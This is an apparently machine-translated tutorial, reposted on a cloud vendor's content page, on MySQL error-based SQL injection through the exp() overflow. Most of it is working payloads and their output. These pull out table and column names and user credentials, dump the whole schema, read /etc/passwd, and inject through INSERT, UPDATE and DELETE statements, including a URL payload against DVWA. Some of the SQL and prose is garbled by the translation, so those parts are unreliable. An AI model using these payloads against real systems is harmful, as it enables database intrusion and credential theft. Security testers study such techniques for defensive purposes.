Using EXP for SQL error injection

Source: Internet
Author: User
Tags bitwise mathematical functions sql error

0x01 Preface Overview

Good news ~ The author also MySQL found a Double type of data overflow in. If you want to understand the use of overflow to note the data, you can read the author's previous blog post: BIGINT Overflow Error based injections,drops above also has a corresponding translation, see here. When we get MySQL the function in, the author is more interested in the mathematical functions, they should also contain some data types to hold the value. So the author ran to the test to see which functions would have overflow errors. The author then discovers that when a value greater than 709 is passed, 函数exp() an overflow error is raised.

Mysql> Select exp (709); +-----------------------+| EXP (709)              |+-----------------------+| 8.218407461554972e307 |+-----------------------+1 row in Set (0.00 sec) MySQL > select exp (710); ERROR 1690 (22003): DOUBLE value is out of range in ' exp (710) '

In MySQL , exp contrary to ln log the function of and, simply introduced, is log and both return the logarithm of the ln base e, see equation:

Mysql> Select log, +------------------+| Log (|+)          ------------------+| 2.70805020110221 |+------------------+1 row in Set (0.00 sec) mysql> Select ln (15) ;+------------------+| ln (|+)           ------------------+| 2.70805020110221 |+------------------+1 row in Set (0.00 sec)

An exponential function is an inverse function of a logarithmic function, which is a exp() logarithmic function with the base e, such as an equation:

Mysql> Select exp (2.70805020110221); +-----------------------+| Exp (2.70805020110221) |+-----------------------+|                    |+-----------------------+1 Row in Set (0.00 sec)
0x02 Injection

When it comes to injection, we use a negative query to cause " DOUBLE value is out of range " errors. As mentioned by the author's previous blog post, the 0 bitwise inverse will return " 18446744073709551615 ", plus the reason that the function returns 0 after successful execution, we will get the maximum unsigned value for the successfully executed function BIGINT .

Mysql> Select ~0;+----------------------+| ~0                   |+----------------------+| 18446744073709551615 |+----------------------+1 row in Set (0.00 sec) mysql> Select ~ (select version ()); +----------------------+| ~ (select version ())  |+----------------------+| 18446744073709551610 |+----------------------+1 row in set, 1 Warning (0.00 sec)

We use subqueries and bitwise negation, resulting DOUBLE overflow error in one, and thereby injecting data.

> ' exp (~ (Select*from (select User ()) x) '    mysql> Select exp (~ (Select*from (select User ()) x));    ERROR 1690 (22003): DOUBLE value is out of range in ' Exp (((select ' [email protected] ' from dual)) '
0X03 Note out data

Get Table name:

Select exp (~ (SELECT*FROM (select table_name from information_schema.tables where table_schema=database () limit 0,1) x));

Get Column Name:

Select exp (~ (Select*from (select column_name from Information_schema.columns where table_name= ' users ' limit 0,1) x));

Retrieving data:

Select exp (~ (Select*from (': ', ID, username, password) from the users limit 0,1) x));
0x04 overnight

This query can dump all tables and columns from the current context. We can also dump out all of the databases, but since we are extracting them through an error, it will return very few results.

Exp (~ (Select*from (Concat (@:=0, (SELECT COUNT (*) from ' information_schema '. Columns where table_schema=database () [Email Protected]:=concat (@,0xa,table_schema,0x3a3a,table_name,0x3a3a,column_name)), @))) http://localhost/ Dvwa/vulnerabilities/sqli/?id=1 ' or exp (~ (Select*from (select (Concat (@:=0) (SELECT COUNT (*) from ' information_schema ' . columns where table_schema=database () [Email Protected]:=concat (@,0xa,table_schema,0x3a3a,table_name,0x3a3a, column_name))))---&submit=submit#

0x04 Read File

You can load_file() read the file through a function, but the author finds that there are 13 lines of restrictions that the statement can also BIGINT overflow injections use in.

Select exp (~ (Select*from (select Load_file ('/etc/passwd ')));

Note that you cannot write the file because this error is written only in 0.

Mysql> Select exp (~ (select*from (select ' Hello ') a)) into outfile ' c:/out.txt '; ERROR 1690 (22003): DOUBLE value is out of range in ' Exp (((SELECT ' Hello ' from dual)) '    # type C:\out.txt0
0x05 Injection in Insert

Just step by step.

mysql> INSERT into users (ID, username, password) VALUES (2, ' ^ exp (~ (Select*from (select User ()) x)), ' Eyre '); ERROR 1690 (22003): DOUBLE value is out of range in ' Exp (((select ' [email protected] ' from dual)) '

The insert,update delete DIOS same can be used for all and statement queries.

mysql> INSERT into users (ID, username, password) VALUES (2, ' | exp (~ (Select*from (Concat (@:=0, (SELECT COUNT (*) From ' information_schema '. Columns where table_schema=database () [Email Protected]:=concat (@,0xa,table_schema,0x3a3a (Table_name,0x3a3a,column_name)) (@)))) (x)), ' Eyre '); ERROR 1690 (22003): DOUBLE value is out of range in ' exp (~ ((SELECT ' 000newdb::users::idnewdb::users::usernamenewdb::users ::p Assword ' from dual)) '
0x06 Injection in Update
Mysql> Update users set password= ' Peter ' ^ exp (~ (Select*from (select User ()) x)) where id=4; ERROR 1690 (22003): DOUBLE value is out of range in ' Exp (((select ' [email protected] ' from dual)) '
0x07 Injection in Delete
Mysql> Delete from users where id= ' 1 ' | Exp (~ (Select*from (select User ()) x)); ERROR 1690 (22003): DOUBLE value is out of range in ' Exp (((select ' [email protected] ' from dual)) '
0X08 Summary

As with the previous bigint injection, exp injection is also available for MySQL5.5.5 and above versions. The previous version was "silent" for this situation.

Mysql> select version (); +---------------------+| Version ()           |+---------------------+| 5.0.45-community-nt |+---------------------+1 row in Set (0.00 sec) mysql> Select exp (710); +----------+| EXP (710) |+----------+|   1. #INF |+----------+1 row in Set (0.00 sec) mysql> Select exp (~0); +---------+| Exp (~0) |+---------+|  1. #INF |+---------+1 row in Set (0.00 sec)

Using EXP for SQL error injection

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.